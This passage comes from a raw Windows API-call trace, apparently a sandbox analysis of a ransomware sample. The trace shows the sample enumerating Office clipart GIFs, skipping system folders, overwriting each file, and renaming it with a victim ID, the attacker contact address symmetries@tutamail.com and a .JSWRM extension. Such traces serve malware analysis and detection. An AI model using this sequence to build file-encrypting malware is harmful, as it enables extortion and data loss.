hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0073.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.678] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00160_.GIF", cAlternateFileName="")) returned 1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2=".") returned 1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="..") returned 1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="...") returned 1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="windows") returned -1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="recovery") returned -1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="perflogs") returned -1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="documents and settings") returned -1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="system volume information") returned -1 [0073.678] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="msocache") returned -1 [0073.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00160_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00160_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00160_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0073.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00160_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00160_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00160_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.679] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1146) returned 1 [0073.679] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x203550 [0073.679] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x470, lpOverlapped=0x0) returned 1 [0073.681] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.681] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x470, lpOverlapped=0x0) returned 1 [0073.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0073.681] CloseHandle (hObject=0x460) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0073.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0073.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0073.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0073.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.682] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d9f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00161_.GIF", cAlternateFileName="")) returned 1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2=".") returned 1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="..") returned 1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="...") returned 1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="windows") returned -1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="recovery") returned -1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="perflogs") returned -1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="documents and settings") returned -1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="system volume information") returned -1 [0073.682] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="msocache") returned -1 [0073.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00161_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00161_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00161_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00161_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00161_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00161_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.684] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7583) returned 1 [0073.684] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d90) returned 0x24c1d0 [0073.684] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1d90, lpOverlapped=0x0) returned 1 [0073.685] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.686] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1d90, lpOverlapped=0x0) returned 1 [0073.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.686] CloseHandle (hObject=0x460) returned 1 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0073.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0073.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0073.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.687] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b48, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00163_.GIF", cAlternateFileName="")) returned 1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2=".") returned 1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="..") returned 1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="...") returned 1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="windows") returned -1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="recovery") returned -1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="perflogs") returned -1 [0073.687] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="documents and settings") returned -1 [0073.688] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.688] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="system volume information") returned -1 [0073.688] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="msocache") returned -1 [0073.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00163_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00163_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00163_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00163_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00163_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00163_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.688] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6984) returned 1 [0073.688] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b40) returned 0x24c1d0 [0073.688] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1b40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1b40, lpOverlapped=0x0) returned 1 [0073.699] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.699] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1b40, lpOverlapped=0x0) returned 1 [0073.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.699] CloseHandle (hObject=0x460) returned 1 [0073.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0073.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0073.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0073.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0073.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0073.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0073.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.700] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33c6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00164_.GIF", cAlternateFileName="")) returned 1 [0073.700] lstrcmpiW (lpString1="AG00164_.GIF", lpString2=".") returned 1 [0073.700] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="..") returned 1 [0073.700] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="...") returned 1 [0073.700] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="windows") returned -1 [0073.700] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="recovery") returned -1 [0073.701] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="perflogs") returned -1 [0073.701] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="documents and settings") returned -1 [0073.701] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.701] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="system volume information") returned -1 [0073.701] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="msocache") returned -1 [0073.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00164_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.701] WideCharToMultiByte (in: 